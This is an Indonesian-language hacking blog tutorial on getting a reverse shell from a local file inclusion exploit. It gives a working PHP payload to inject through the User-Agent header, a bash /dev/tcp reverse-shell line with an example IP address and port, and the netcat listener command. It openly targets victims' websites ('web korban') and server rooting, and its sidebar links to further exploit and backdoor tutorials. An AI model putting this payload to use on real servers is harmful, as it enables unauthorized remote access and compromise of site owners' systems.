• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Reverse Shell From Local File Inclusion Exploit

June 8, 2016 by Jack Wilder 1 Comment

Kali ini saya hanya share tutorial ringan mengenai cara mendapatkan remote shell dari LFI exploit. Ini tentu sangat berguna saat kita gagal mengupload backdoor ke web korban atau bahkan akan memudahkan kita saat ingin melakukan rooting server.
Sebelum meneruskan tutorial ini, saya anggap kalian sudah paham dasar dari LFI exploit itu sendiri.

Untuk tutorialnya bisa baca disini :

Uploading Backdoor Shell via Local File Inclusion (LFI) Exploit
Hanya saja seperti kasus yang saya alami, kadang kala kita gagal mengupload backdoor ke web target. Akibatnya web gagal di expore.
Nah silahkan lihat ss berikut :
Yup, bash shell dari web target.
Caranya cukup mudah, saat melakukan proses tamper data, user-agent nya isikan command berikut :
<?system('bash -i >& /dev/tcp/ip-vps/port 0>&1');?>
Contoh :
<?system('bash -i >& /dev/tcp/54.179.146.109/1337 0>&1');?>
Nah tentu saja sebelum melakukan tamper data kalian harus mengaktifkan netcat terlebih dahulu.
[root@vps]# nc -l 1337

Dan kalo servernya memang bisa di back connect, kita akan mendapatkan akses shell ke server target di vps kita.
Oke sekian tutorial kali ini, semoga bermanfaat.

Filed Under: LFI Tagged With: Exploit, Linux, SSH

Reader Interactions

Comments

  1. kakatoji says

    September 11, 2017 at 8:55 pm

    Mantap mas

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

Shopify Custom Domain or Subdomain Takeover

Heroku Custom Domain or Subdomain Takeover

Upload Backdoor Lewat MySQL Database (phpMyAdmin)

Bruteforce FTP Login dengan Metasploit Module FTP Authentication Scanner

Hack Targeted Website using Reverse IP

Exploit WPStore Themes Upload Vulnerability

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Cara Mendapatkan RDP Gratis Dengan Shell Windows

WordPress 4.7.0/4.7.1 Content Injection Exploit

LinuxSec / 14 queries in 0.11 seconds